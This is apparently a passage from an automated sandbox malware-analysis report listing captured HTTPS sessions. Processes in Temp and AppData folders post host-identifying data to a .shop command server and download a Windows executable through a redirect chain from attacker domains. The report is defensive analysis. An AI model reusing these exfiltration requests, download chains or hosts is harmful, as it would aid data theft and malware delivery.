                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: drive.google.com
                                                                                                                                                                                                                                      2024-03-28 16:51:25 UTC978INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri https://csp.withgoogle.com/csp/docs-tt
                                                                                                                                                                                                                                      Referrer-Policy: origin
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Server: GSE
                                                                                                                                                                                                                                      Set-Cookie: NID=512=dmDo8OUs1Dh_SH2CoFYz06Eio_Ao_PKWwCOGf0G4r33OGV2xphJa0LlfSc1X5XJqO5CfTRsHV5wK875xl0PkQQilAqO8Wq5JKQmBdu1c4EMDiEndK2XcoiA2onhuuBtr8m19WMevgUR8bvIldS8IH9CmAMTkZBZMtR3QsOGd2TE; expires=Fri, 27-Sep-2024 16:51:25 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      2024-03-28 16:51:25 UTC274INData Raw: 62 30 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 62 20 77 6f 72 64 20 70 72 6f 63 65 73 73 69 6e 67 2c 20 70 72 65 73 65 6e 74 61 74 69 6f 6e 73 20 61 6e 64 20 73 70 72 65 61 64 73 68 65 65 74 73 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c
                                                                                                                                                                                                                                      Data Ascii: b07<!DOCTYPE html><html lang="en"><head><meta name="description" content="Web word processing, presentations and spreadsheets"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=0"><
                                                                                                                                                                                                                                      2024-03-28 16:51:25 UTC1252INData Raw: 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 64 6f 63 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 72 6f 64 75 63 74 2b 53 61 6e 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6e 6f 6e 63 65 3d 22 73 35 61 34 70 71 52 68 7a 42 6d 31 42 67 71 68 6f 6b 6f 39 69 41 22 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 35 61 34 70 71 52 68 7a 42 6d 31 42 67 71
                                                                                                                                                                                                                                      Data Ascii: icon" href="//docs.google.com/favicon.ico"><title>Error</title><meta name="referrer" content="origin"><link href="//fonts.googleapis.com/css?family=Product+Sans" rel="stylesheet" type="text/css" nonce="s5a4pqRhzBm1Bgqhoko9iA"><style nonce="s5a4pqRhzBm1Bgq
                                                                                                                                                                                                                                      2024-03-28 16:51:25 UTC1252INData Raw: 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6e 6f 6e 63 65 3d 22 73 35 61 34 70 71 52 68 7a 42 6d 31 42 67 71 68 6f 6b 6f 39 69 41 22 3e 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 61 2c 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 31 31 32 41 42 42 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6e 6f 6e 63 65 3d 22 73 35 61 34 70 71 52 68 7a 42 6d 31 42 67 71 68 6f 6b 6f 39 69 41
                                                                                                                                                                                                                                      Data Ascii: e><style type="text/css" nonce="s5a4pqRhzBm1Bgqhoko9iA">body {background-color: #fff; font-family: Arial,sans-serif; font-size: 13px; margin: 0; padding: 0;}a, a:link, a:visited {color: #112ABB;}</style><style type="text/css" nonce="s5a4pqRhzBm1Bgqhoko9iA
                                                                                                                                                                                                                                      2024-03-28 16:51:25 UTC52INData Raw: 67 69 6e 2d 74 6f 70 3a 20 38 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                      Data Ascii: gin-top: 80px; position: relative;}</style></html>
                                                                                                                                                                                                                                      2024-03-28 16:51:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      10192.168.2.649729104.21.94.24435352C:\Users\user\AppData\Local\Temp\A0B.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:26 UTC290OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 19970
                                                                                                                                                                                                                                      Host: resergvearyinitiani.shop
                                                                                                                                                                                                                                      2024-03-28 16:51:26 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 31 31 34 44 42 45 36 31 38 44 43 45 34 39 45 39 36 41 33 42 43 30 36 42 38 41 41 34 44 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70
                                                                                                                                                                                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"45114DBE618DCE49E96A3BC06B8AA4D3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
                                                                                                                                                                                                                                      2024-03-28 16:51:26 UTC4639OUTData Raw: bb 32 f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b
                                                                                                                                                                                                                                      Data Ascii: 2+?2+?2+?o?Mp5
                                                                                                                                                                                                                                      2024-03-28 16:51:26 UTC810INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=68s2s7ncl8hvu5mins9iei5g8h; expires=Mon, 22-Jul-2024 10:38:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qNDpo7VZXsw5v%2BZVFb4hMk4AQPamcea%2BS2TaQJCcPyRPUL0O%2BIW87z4Qhz4OxaFZVY5pF5FfXy5NK7200XG2WYOCSvEnIAi3VqcLB7MF8otQdHlWIUjtnH198tE1sjfU4b54S2vBbzWAnZ4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 86b91ff98e6d823f-IAD
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-03-28 16:51:26 UTC22INData Raw: 31 30 0d 0a 6f 6b 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 10ok 102.165.48.43
                                                                                                                                                                                                                                      2024-03-28 16:51:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      11192.168.2.649730172.67.207.1274434004C:\Windows\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:27 UTC187OUTGET /e0cbefcb1af40c7d4aff4aca26621a98.exe HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: jennyilis.com
                                                                                                                                                                                                                                      2024-03-28 16:51:27 UTC691INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Location: https://kilperdoper.com/2b7fa37605b0ad5f1a14cbc68bbdca6f/e0cbefcb1af40c7d4aff4aca26621a98.exe
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qutb%2BVVucUG4SaTeJRpNZuAMN%2BRYCVX7pjVZEkStF5RTdbEd5stgtnixmjBZZNUz%2BnG0gBRqjFj1GhPbbXZuDhlvKT6rMppOLjvrsSczPUeDUgxuHdWNB%2BOE9t99ehGG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 86b92001f97756fe-IAD
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-03-28 16:51:27 UTC135INData Raw: 38 31 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 69 6c 70 65 72 64 6f 70 65 72 2e 63 6f 6d 2f 32 62 37 66 61 33 37 36 30 35 62 30 61 64 35 66 31 61 31 34 63 62 63 36 38 62 62 64 63 61 36 66 2f 65 30 63 62 65 66 63 62 31 61 66 34 30 63 37 64 34 61 66 66 34 61 63 61 32 36 36 32 31 61 39 38 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 81<a href="https://kilperdoper.com/2b7fa37605b0ad5f1a14cbc68bbdca6f/e0cbefcb1af40c7d4aff4aca26621a98.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                      2024-03-28 16:51:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      12192.168.2.649731104.21.65.244433544C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:27 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                                                                                      Host: api.2ip.ua
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC891INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:28 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C1yxzEL6IwoxDwirWGJxn3Fb6Xokfwl0y%2B4JStIhV%2F9z2uZiB%2BJeBDPlPokgaCUqkAJuEOBgT0YnY%2BOqxoHXa5vNj0zCTUmtpWVVz7Ae8AbgVAviyjpgzWG7ScaZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 86b92003ebde3b80-IAD
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC478INData Raw: 32 30 39 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c
                                                                                                                                                                                                                                      Data Ascii: 209{"ip":"102.165.48.43","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC50INData Raw: 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 33 38 2e 38 39 35 33 39 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 37 2e 30 33 39 34 37 36 22 7d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: ,"latitude":"38.89539","longitude":"-77.039476"}
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      13192.168.2.649732104.21.94.24435352C:\Users\user\AppData\Local\Temp\A0B.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC289OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 1266
                                                                                                                                                                                                                                      Host: resergvearyinitiani.shop
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC1266OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 31 31 34 44 42 45 36 31 38 44 43 45 34 39 45 39 36 41 33 42 43 30 36 42 38 41 41 34 44 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70
                                                                                                                                                                                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"45114DBE618DCE49E96A3BC06B8AA4D3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=cidhiq4k06r9dg2hbs1diqaf5c; expires=Mon, 22-Jul-2024 10:38:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YEZ1Ia7VLquOpV2B8WYRxDQN7hVBR0Vjj8DSkeMMvcqPD1VUhszhX%2Fj9lfxMxAPORTHKbOwKcalDTux60o4IsquE3owtxgIClL2NqhCZkYQSIeVnuEXkOJlPkSg8AjV3Y1fGFehNWERgVIw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 86b920056da2084c-IAD
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC22INData Raw: 31 30 0d 0a 6f 6b 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 10ok 102.165.48.43
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      14192.168.2.649733172.67.156.204434004C:\Windows\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC222OUTGET /2b7fa37605b0ad5f1a14cbc68bbdca6f/e0cbefcb1af40c7d4aff4aca26621a98.exe HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: kilperdoper.com
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC677INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:28 GMT
                                                                                                                                                                                                                                      Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                      Content-Length: 4344720
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Last-Modified: Thu, 28 Mar 2024 16:37:18 GMT
                                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                                      CF-Cache-Status: MISS
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UXf6uw17i%2BXRPBJi31m851ukv06CIwuU2Cf5W4Rez%2BTNxMMaCm7B0f2DL%2BJQkag77v4fUPpYv1C6Ja67%2BEB%2BWgVdWQmiOFfTAGmAo0FgvLhrlZcxx06fMeaTtZsTm9qf0FQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 86b92006fe620603-IAD
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC692INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 51 c7 79 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00
                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELQyd
                                                                                                                                                                                                                                      2024-03-28 16:51:28 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii:
